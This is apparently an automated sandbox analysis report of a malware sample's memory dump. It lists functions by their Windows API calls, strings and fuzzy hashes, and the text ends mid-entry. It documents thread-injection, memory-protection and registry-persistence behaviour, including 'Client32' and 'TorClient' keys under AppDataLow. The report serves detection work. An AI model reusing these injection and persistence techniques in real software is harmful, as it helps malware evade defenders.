Part of subcall function 00CA6CBC: NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 00CA6CFD

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00CA9D6E
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00CA9E59

Part of subcall function 00CA6CBC: StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000000,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 00CA6E67

VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,?,?), ref: 00CA9DA4
VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00CA9DB0
lstrcmpi.KERNEL32(?,00000000), ref: 00CA9DED
StrChrA.SHLWAPI(?,0000002E), ref: 00CA9DF6
lstrcmpi.KERNEL32(?,00000000), ref: 00CA9E08

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcmpi$AddressInformationProcProcess64QueryWow64
String ID:
API String ID: 3901270786-0
Opcode ID: be40a243ce5b369d61d65bed40968b41328b39c042ced5098d62836296980dfc
Instruction ID: db99ed3d5a903eb6ffcd8ba3c3a265625a80478a494e1a061ef33fff7ca74437
Opcode Fuzzy Hash: be40a243ce5b369d61d65bed40968b41328b39c042ced5098d62836296980dfc
Instruction Fuzzy Hash: 8531A231505312ABD321CF11DC41B1BBBE8FF8A758F100A1CF994A7241C774EA44CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00C98554, Relevance: 10.6, APIs: 7, Instructions: 80sleepthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA4F76: memset.NTDLL ref: 00CA4F80

OpenEventA.KERNEL32(00000002,00000000,00CBE130,?,00000000,00000000,?,00CA15E7), ref: 00C985E4
SetEvent.KERNEL32(00000000,?,00CA15E7), ref: 00C985F1
Sleep.KERNELBASE(00000BB8,?,00CA15E7), ref: 00C985FC
ResetEvent.KERNEL32(00000000,?,00CA15E7), ref: 00C98603
CloseHandle.KERNEL32(00000000,?,00CA15E7), ref: 00C9860A
GetShellWindow.USER32 ref: 00C98615
GetWindowThreadProcessId.USER32(00000000), ref: 00C9861C

Part of subcall function 00C9F792: RegCloseKey.ADVAPI32(?), ref: 00C9F815

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
String ID:
API String ID: 53838381-0
Opcode ID: 7869506f97bed4710d616fa979cf3bb447016f9d0e732da722800c3bd0174a89
Instruction ID: 6e6e1ce7c160ef30403265b3d9311730a76e509d2cfc004cb0b883607cfd56be
Opcode Fuzzy Hash: 7869506f97bed4710d616fa979cf3bb447016f9d0e732da722800c3bd0174a89
Instruction Fuzzy Hash: 0E21F032100210BBDA207BAAAC4CFAF7B6DFBC6B60F144A08F61287152DF349805DB71

Uniqueness

Uniqueness Score: -1.00%

Function 00CAE866, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA6AB9: lstrlen.KERNEL32(?,00000000,00CAEC1E,00000027,00CBE0D4,?,00000000,?,?,00CAEC1E,Local\,00000001,?,00CB0C37,00000000,00000000), ref: 00CA6AEF
Part of subcall function 00CA6AB9: lstrcpy.KERNEL32(00000000,00000000), ref: 00CA6B13
Part of subcall function 00CA6AB9: lstrcat.KERNEL32(00000000,00000000), ref: 00CA6B1B

RegOpenKeyExA.KERNELBASE(00CA4F98,00000000,00000000,00020119,80000001,00000000,Software\AppDataLow\Software\Microsoft\,00000000,?,00CBE130,00CA4F98,00CA15E7,80000001,?,00CA15E7), ref: 00CAE89F
RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,?,?,00CA15E7), ref: 00CAE8B3
RegCloseKey.KERNELBASE(?,?,Client32,?,?,?,00CA15E7), ref: 00CAE8FC

Strings

Software\AppDataLow\Software\Microsoft\, xrefs: 00CAE874
Client64, xrefs: 00CAE8E5
Client32, xrefs: 00CAE8C1

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Open$Closelstrcatlstrcpylstrlen
String ID: Client32$Client64$Software\AppDataLow\Software\Microsoft\
API String ID: 4131162436-710576342
Opcode ID: fb66a6f23f33af8a045724a9a33378d239ebc65f41e57680bd1416999a00c989
Instruction ID: 3be2f977c3273259695f6f68f1da9f5ea7402a754237058e51be21b409d579f8
Opcode Fuzzy Hash: fb66a6f23f33af8a045724a9a33378d239ebc65f41e57680bd1416999a00c989
Instruction Fuzzy Hash: BE11607290021EFFDB10AFE9DC85DAFBBBDEB46318B10407AF910A6151D3709E059BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA18D2, Relevance: 9.1, APIs: 6, Instructions: 125threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00CA18F5

Part of subcall function 00CA33D3: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00C94655,00000000), ref: 00CA33EE
Part of subcall function 00CA33D3: IsWow64Process.KERNEL32(?,?,?,?,?,?,00C94655,00000000), ref: 00CA33FF
Part of subcall function 00CA33D3: FindCloseChangeNotification.KERNELBASE(?,?,?,?,00C94655,00000000), ref: 00CA3412

ResumeThread.KERNEL32(00000004,?,00000000,CCCCFEEB,?,00000000,00000000,00000004,?,00000000,00000000,74784EE0,00000000), ref: 00CA19AF
WaitForSingleObject.KERNEL32(00000064), ref: 00CA19BD
SuspendThread.KERNEL32(00000004), ref: 00CA19D0

Part of subcall function 00CA7579: memset.NTDLL ref: 00CA783B

ResumeThread.KERNELBASE(00000004), ref: 00CA1A53

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Thread$ProcessResumememset$ChangeCloseFindNotificationObjectOpenSingleSuspendWaitWow64
String ID:
API String ID: 2336522172-0
Opcode ID: 42cef775e2e4be47305e289a10956c388772751a16c10bb1c642c30b9daa0347
Instruction ID: adbc6679b6225b59698bded12510fdf749d8f229b6f0ed63887acd960b71a584
Opcode Fuzzy Hash: 42cef775e2e4be47305e289a10956c388772751a16c10bb1c642c30b9daa0347
Instruction Fuzzy Hash: 5341CD3190020AEFDF11AFA1DC84BAE7BBAFF05358F084425F915A6160CB30DE95EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00C9FFED, Relevance: 9.1, APIs: 6, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00CBD514,?,00CBA578,00000018,00CA3B8C,00000000,00000002,00CBD518,00000000,00CBD514,00000000), ref: 00CA0030
VirtualProtect.KERNELBASE(00000000,00000004,?,?,00000000,00000004,?,00000000,?,?,?,00CBD514,?,00CBA578,00000018,00CA3B8C), ref: 00CA00BB
RtlEnterCriticalSection.NTDLL(00CBE240), ref: 00CA00E3
RtlLeaveCriticalSection.NTDLL(00CBE240), ref: 00CA0101

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
String ID:
API String ID: 3666628472-0
Opcode ID: e08dc02010db31f4bb1749df7fe6dbd8541d09954d5491f77d79b2ebdaacddd8
Instruction ID: a4bc8e3ab2fa6178e24bdb16703431ad12a6ea1b2ecafa4c6f054d0dce3c2388
Opcode Fuzzy Hash: e08dc02010db31f4bb1749df7fe6dbd8541d09954d5491f77d79b2ebdaacddd8
Instruction Fuzzy Hash: E24190B0900606EFCB11DFA5C880ADEBBF8FF49340F20851AE516E7260D770AA45DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CA45CA, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,00C91440,?,?,?,?,00CA7689,?,?,00000000,?,00000B54), ref: 00CA45EF
GetProcAddress.KERNEL32(00000000,7243775A), ref: 00CA4611
GetProcAddress.KERNEL32(00000000,614D775A), ref: 00CA4627
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 00CA463D
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 00CA4653
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 00CA4669

Part of subcall function 00C9E010: NtCreateSection.NTDLL(00000000,000F001F,?,?,?,08000000,00000000,74784EE0,00000000,00000000), ref: 00C9E06D
Part of subcall function 00C9E010: memset.NTDLL ref: 00C9E091

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: 262006ea71f1d53aef94ffbca395e097843cc115060fa572b515c8977d80e519
Instruction ID: 34682b6d6b3060118940094b6a3f2fcc973104b967cc70b125d5303ce49519ef
Opcode Fuzzy Hash: 262006ea71f1d53aef94ffbca395e097843cc115060fa572b515c8977d80e519
Instruction Fuzzy Hash: B0217FB150020AEFD720EFA9DC44FAA77ECEB4A748B044569F509C7211E7B0EA49DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00CAC0AB, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,00C9402D), ref: 00CAC0C2
QueueUserAPC.KERNELBASE(?,00000000,?,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CAC0D7
GetLastError.KERNEL32(00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CAC0E2
TerminateThread.KERNEL32(00000000,00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CAC0EC
CloseHandle.KERNEL32(00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CAC0F3
SetLastError.KERNEL32(00000000,?,?,00CB58C6,?,?,?,?,?,00C920D2,?), ref: 00CAC0FC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
String ID:
API String ID: 3832013932-0
Opcode ID: c9a4844a02fdd3990a97ab554d6262e22bbcc0a3a5daec13379d49c4ad2a224b
Instruction ID: a0101c2768515e41faa1ea833cb5dd0dabeda708a81826d1a2ecd144b19ba1ec
Opcode Fuzzy Hash: c9a4844a02fdd3990a97ab554d6262e22bbcc0a3a5daec13379d49c4ad2a224b
Instruction Fuzzy Hash: DFF01C32246621BBD7226BA4BC48F5FBA6DFB097A2F004604F70591160CB358A19EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CAE65F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memcpy.NTDLL(00CBE130,74784D40,00000018,00000001,00000000,74784D40,00CA7CD1,?,?), ref: 00CAE675
GetModuleHandleA.KERNEL32(NTDLL.DLL,00000001,00000000,74784D40,00CA7CD1,?,?), ref: 00CAE69A
GetModuleHandleA.KERNEL32(KERNEL32.DLL), ref: 00CAE6AA

Strings

NTDLL.DLL, xrefs: 00CAE683
KERNEL32.DLL, xrefs: 00CAE6A5

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HandleModule$memcpy
String ID: KERNEL32.DLL$NTDLL.DLL
API String ID: 1864057842-633099880
Opcode ID: 69624f571fda4306657dcf2c8534d825386068a73d479c71686242f8afed419a
Instruction ID: e36c520aec8b80759f430a4b218deda5a4b452388a5daefbcb2bd5c140e4d251
Opcode Fuzzy Hash: 69624f571fda4306657dcf2c8534d825386068a73d479c71686242f8afed419a
Instruction Fuzzy Hash: 3D012D72640306ABEB10AF59EC8179D77D4BB65B08F240E3AF141831E1DBB05949DB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CA672D, Relevance: 7.6, APIs: 5, Instructions: 67registrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9810A: RegCreateKeyA.ADVAPI32(80000001,07D18900,?), ref: 00C9811F
Part of subcall function 00C9810A: lstrlen.KERNEL32(07D18900,00000000,00000000,?,?,00CA79A9,00000000,?), ref: 00C9814D

RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00C91CDF,00000000,00000000,?,?,00000000,?,?,?,00C91CDF,TorClient), ref: 00CA6765
RtlAllocateHeap.NTDLL(00000000,00C91CDF), ref: 00CA6779
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00C91CDF,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA6793
HeapFree.KERNEL32(00000000,00C91CDF,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA67AF
RegCloseKey.KERNELBASE(?,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA67BD

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseCreateFreelstrlen
String ID:
API String ID: 1633053242-0
Opcode ID: 5ff08476371eaf4fa6873979fb7a924ea28c072d9275fdf9398210a0117f1bb3
Instruction ID: 97222cd38df7bc8a82cb3967518ad6e79a88853d4468965383f866477b9daadc
Opcode Fuzzy Hash: 5ff08476371eaf4fa6873979fb7a924ea28c072d9275fdf9398210a0117f1bb3
Instruction Fuzzy Hash: 5F1137B651010AFFDF01AFA4DC84EAE7B7EFB89358B150426F902D3160EA319E55DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB5277, Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,00000000,00000040,00000004,00000000,?,00000000,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275), ref: 00CB529C
GetLastError.KERNEL32(?,00000000,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275,?,?), ref: 00CB52A4
VirtualQuery.KERNEL32(?,00000000,0000001C,?,00000000,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275,?,?), ref: 00CB52BB
VirtualProtect.KERNEL32(?,00000000,-392CC87E,00000004,?,00000000,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275,?), ref: 00CB52E0
SetLastError.KERNEL32(00000000,?,00000000,00000000,?,?,00C9619F,00000004,00000000,?,00000000,00C9B275,?,?), ref: 00CB52E9

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Virtual$ErrorLastProtect$Query
String ID:
API String ID: 148356745-0
Opcode ID: 9f0913ee076139e06b8753bfb47148d3a41d0541cc223592fd91155c0f827479
Instruction ID: 82210a65806239d98dab87315e58d029ccaa8fe17233457230f1eb1ca6001c69
Opcode Fuzzy Hash: 9f0913ee076139e06b8753bfb47148d3a41d0541cc223592fd91155c0f827479
Instruction Fuzzy Hash: BD014C3260110AAF9F119FA5DC40ADEBBBDFF08354B008126F91293160DB719A55DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C91300, Relevance: 6.1, APIs: 4, Instructions: 110threadsynchronizationinjectionCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00C9132E
ResumeThread.KERNELBASE(?,?,?,?,?,00000004,?), ref: 00C913B8
WaitForSingleObject.KERNEL32(00000064,?,?,?,?,00000004,?), ref: 00C913C6
SuspendThread.KERNELBASE(?,?,?,?,?,00000004,?), ref: 00C913D9

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Thread$ObjectResumeSingleSuspendWaitmemset
String ID:
API String ID: 3168247402-0
Opcode ID: 98137cd4f4fb9c6bdd209a52c8ab00099c3a6ed757ec8e11449194b26d209f53
Instruction ID: 1095bce00de31031b1214f50358d0f93e58b2b8331deca3b41df0a59f47c4809
Opcode Fuzzy Hash: 98137cd4f4fb9c6bdd209a52c8ab00099c3a6ed757ec8e11449194b26d209f53
Instruction Fuzzy Hash: E4418071108302AFEB11EF54DC46E6BBBE9FF88354F08492DFAA481160D731DA58DB66

Uniqueness

Uniqueness Score: -1.00%

Function 00C98CA2, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?), ref: 00C98CF4
memcpy.NTDLL(?,?,?,?,?,?), ref: 00C98D85
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00C98DA0

Strings

Dec 21 2020, xrefs: 00C98D15

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Dec 21 2020
API String ID: 4010158826-582694290
Opcode ID: 144f641c632b7310f538024f886682a3fa8e0d81dbf45e03c1fff0841c44b4fe
Instruction ID: 8e390f8e72ab419fab6afb3733d115d088e62730ada931007538944ce72f53f6
Opcode Fuzzy Hash: 144f641c632b7310f538024f886682a3fa8e0d81dbf45e03c1fff0841c44b4fe
Instruction Fuzzy Hash: 3C316472E0020AABDF00DF98CC85BEEB7B9BF45744F140169E515FB280D771AA069B90

Uniqueness

Uniqueness Score: -1.00%

Function 00C9ED95, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(00CAE8CE,?,00000000,00CAE8CE,00000000,?,00000000,?,?,?,?,00CAE8CE,?,Client32,?,?), ref: 00C9EDBA
RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00C9EDD1
HeapFree.KERNEL32(00000000,00000000,?,?,?,00CAE8CE,?,Client32,?,?,?,00CA15E7), ref: 00C9EDEC
RegQueryValueExA.KERNELBASE(00CAE8CE,?,00000000,00CAE8CE,00000000,?,?,?,?,00CAE8CE,?,Client32,?,?,?,00CA15E7), ref: 00C9EE0B

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateFree
String ID:
API String ID: 4267586637-0
Opcode ID: 7b82330e613c059ac157c4465a65f0a37c0ac8ef820fc5fc768ee4c97c73df01
Instruction ID: 9cfb0d01a1dc44ce992e2db5302799cda57e8f3695a6acfbee1b7d4891b5b9c6
Opcode Fuzzy Hash: 7b82330e613c059ac157c4465a65f0a37c0ac8ef820fc5fc768ee4c97c73df01
Instruction Fuzzy Hash: A2118CB6510118FFCF12DF85DC88EEEBBBCEB99350F104556F802A2110E6715E50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CA1F00, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,00CBE088,00000000,00C9D9F2,?,00C99809,?), ref: 00CA1F1F
PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,00CBE088,00000000,00C9D9F2,?,00C99809,?), ref: 00CA1F2A
_wcsupr.NTDLL ref: 00CA1F37
lstrlenW.KERNEL32(00000000), ref: 00CA1F3F

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
String ID:
API String ID: 2533608484-0
Opcode ID: f05b8da3150e74a48d50fc63c961c4b54aa591400f4a1770d82df0405a339fbd
Instruction ID: dc29aaaaa89887ea32c0bc2131df5e2c66e23d5e8308328a1d6f6d3ce655ad27
Opcode Fuzzy Hash: f05b8da3150e74a48d50fc63c961c4b54aa591400f4a1770d82df0405a339fbd
Instruction Fuzzy Hash: D2F059352051421E97122BF46C89BAF5A5CEBC3B98F240139F821C3150CFA0CC05A661

Uniqueness

Uniqueness Score: -1.00%

Function 00CA44DC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9810A: RegCreateKeyA.ADVAPI32(80000001,07D18900,?), ref: 00C9811F
Part of subcall function 00C9810A: lstrlen.KERNEL32(07D18900,00000000,00000000,?,?,00CA79A9,00000000,?), ref: 00C9814D

RegQueryValueExA.KERNELBASE(?,Client,00000000,00C920D2,00CBD06C,?,00000001,?,747DF710,00000000,00000000,00C920D2,?), ref: 00CA4527
RegCloseKey.ADVAPI32(?), ref: 00CA4572

Strings

Client, xrefs: 00CA450E, 00CA4520, 00CA4562, 00CA4591

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CloseCreateQueryValuelstrlen
String ID: Client
API String ID: 971780412-3236430179
Opcode ID: 0fa6cae75e7040c16021cbf7f0a3dd2d1449f538d4ece762ded9923a8e83ffd9
Instruction ID: 62eb768fd7d0aa19ae4093eaa8ec3625e3925005f0519603329f13f385396693
Opcode Fuzzy Hash: 0fa6cae75e7040c16021cbf7f0a3dd2d1449f538d4ece762ded9923a8e83ffd9
Instruction Fuzzy Hash: C6216BB5D00209EFDB10EFA5EC04BAE7BB8EB45B14F00426AF515A7150E7B09A02CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00C9DBF0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00C9810A: RegCreateKeyA.ADVAPI32(80000001,07D18900,?), ref: 00C9811F
Part of subcall function 00C9810A: lstrlen.KERNEL32(07D18900,00000000,00000000,?,?,00CA79A9,00000000,?), ref: 00C9814D

RegQueryValueExA.KERNELBASE(?,System,00000000,?,?,?,00000001,?,747DF710,00000000,?,?,?,00C920D2,?), ref: 00C9DC2E
RegCloseKey.ADVAPI32(?,?,?,?,00C920D2,?), ref: 00C9DC82

Strings

System, xrefs: 00C9DC1E, 00C9DC23, 00C9DC5C

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CloseCreateQueryValuelstrlen
String ID: System
API String ID: 971780412-3470857405
Opcode ID: 017243047d19fb718b0cecaaf782d6cc3eb3ea1ad73340ac240885b58f8d5776
Instruction ID: 8cd57317e1872ece51cbc17e5d2b429f8af1279b31a80860cc7b6da9072dc0f6
Opcode Fuzzy Hash: 017243047d19fb718b0cecaaf782d6cc3eb3ea1ad73340ac240885b58f8d5776
Instruction Fuzzy Hash: 9E113675900208EBEF10ABA5DC49BEEBBB8EB48700F104165E902B2191E7B05A44EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00CAE3A4, Relevance: 5.1, APIs: 4, Instructions: 110COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 00CAE3CA
memcpy.NTDLL ref: 00CAE3F2

Part of subcall function 00C99DAC: NtAllocateVirtualMemory.NTDLL(00CB29D7,00000000,00000000,00CB29D7,00003000,00000040), ref: 00C99DDD
Part of subcall function 00C99DAC: RtlNtStatusToDosError.NTDLL(00000000), ref: 00C99DE4
Part of subcall function 00C99DAC: SetLastError.KERNEL32(00000000), ref: 00C99DEB

GetLastError.KERNEL32(00000010,00000218,00CB6DDD,00000100,?,00000318,00000008), ref: 00CAE409
GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,00CB6DDD,00000100), ref: 00CAE4EC

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Error$Last$AllocateMemoryStatusVirtualmemcpymemset
String ID:
API String ID: 685050087-0
Opcode ID: 5b21fe64a3481910b0fd808678053a926b7e045380c3de088bd08ce82f9d1981
Instruction ID: 726ecc4a06fe15e9419bcbf3e08812a4f90a56baa9ddabf254ab6dee1a6380e3
Opcode Fuzzy Hash: 5b21fe64a3481910b0fd808678053a926b7e045380c3de088bd08ce82f9d1981
Instruction Fuzzy Hash: AC4181B1604302AFD720DF68DC42BABB7F9FB59714F00892DF599C6291E730D9149BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C9810A, Relevance: 4.5, APIs: 3, Instructions: 39registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyA.ADVAPI32(80000001,07D18900,?), ref: 00C9811F
RegOpenKeyA.ADVAPI32(80000001,07D18900,?), ref: 00C9812C
lstrlen.KERNEL32(07D18900,00000000,00000000,?,?,00CA79A9,00000000,?), ref: 00C9814D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CreateOpenlstrlen
String ID:
API String ID: 2865187142-0
Opcode ID: 787c48dce6030246fb6233a1b3920e6590c6df738fbbaf98219badcfa1c6765f
Instruction ID: f105b958ad9ce2bc75656e3c132cd0f1645f6ea4ac9f230e833fe68ba6041723
Opcode Fuzzy Hash: 787c48dce6030246fb6233a1b3920e6590c6df738fbbaf98219badcfa1c6765f
Instruction Fuzzy Hash: 7AF01275004204FFDB119F55DC88F9F7B7CEB463A0F108116FD4696254EA709A49C661

Uniqueness

Uniqueness Score: -1.00%

Function 00CA33D3, Relevance: 4.5, APIs: 3, Instructions: 33COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00C94655,00000000), ref: 00CA33EE
IsWow64Process.KERNEL32(?,?,?,?,?,?,00C94655,00000000), ref: 00CA33FF
FindCloseChangeNotification.KERNELBASE(?,?,?,?,00C94655,00000000), ref: 00CA3412

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Process$ChangeCloseFindNotificationOpenWow64
String ID:
API String ID: 3805842350-0
Opcode ID: a517ea729ebe8a82b1234c276cde74ecd06cd3e214403daefcf79d30794ab098
Instruction ID: 5321fcc244cc19a15b7a159fc01733dc87681ab6df9c47821b46a725600d76ef
Opcode Fuzzy Hash: a517ea729ebe8a82b1234c276cde74ecd06cd3e214403daefcf79d30794ab098
Instruction Fuzzy Hash: 40F08271901514FF8B129F5ADC04ADEBFBCEF86795B108126F914A7110E7348F06D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C99F4D, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 61memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA672D: RegQueryValueExA.KERNELBASE(?,?,00000000,?,00000000,00C91CDF,00000000,00000000,?,?,00000000,?,?,?,00C91CDF,TorClient), ref: 00CA6765
Part of subcall function 00CA672D: RtlAllocateHeap.NTDLL(00000000,00C91CDF), ref: 00CA6779
Part of subcall function 00CA672D: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,00C91CDF,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA6793
Part of subcall function 00CA672D: RegCloseKey.KERNELBASE(?,?,?,?,00C91CDF,TorClient,?,?), ref: 00CA67BD

HeapFree.KERNEL32(00000000,?,?,Ini,?,?,747DF710,00000000,00000000,?,?,?,00CB58BA,?), ref: 00C99FDB

Part of subcall function 00CA5B0D: memcpy.NTDLL(?,?,00000000,?,?,?,00000000,?,00CB19D8,00000000,00000001,-00000007,?,00000000), ref: 00CA5B2F

Strings

Ini, xrefs: 00C99F5D

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: HeapQueryValue$AllocateCloseFreememcpy
String ID: Ini
API String ID: 1301464996-1327165576
Opcode ID: f8bc296b36e9e5771e4eaa13f0ba9433cc60a41bcc06d57a5e287f96bca385db
Instruction ID: ab206c848857bf39eea83c2f69e4fbc46a021f6771d23571a7e9e4f475e8b324
Opcode Fuzzy Hash: f8bc296b36e9e5771e4eaa13f0ba9433cc60a41bcc06d57a5e287f96bca385db
Instruction Fuzzy Hash: 75118275600205ABDF149BCDDC85FEDB7A8EB45754F20003AF602E7291E7709E40D761

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4E92, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

memcpy.NTDLL(00000000,00CBE160,00000018,00CA7789,NTDLL.DLL,7250775A,00CA7789,NTDLL.DLL,4772644C,00CA7789,NTDLL.DLL,4C72644C,?,00000000,?,00CA7789), ref: 00CA4F47

Strings

NTDLL.DLL, xrefs: 00CA4EDB, 00CA4EFF, 00CA4F23

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: memcpy
String ID: NTDLL.DLL
API String ID: 3510742995-1613819793
Opcode ID: 876a1844408ab627f93bba079d5955f375b694bcaa502b9eeaf279b2b8832491
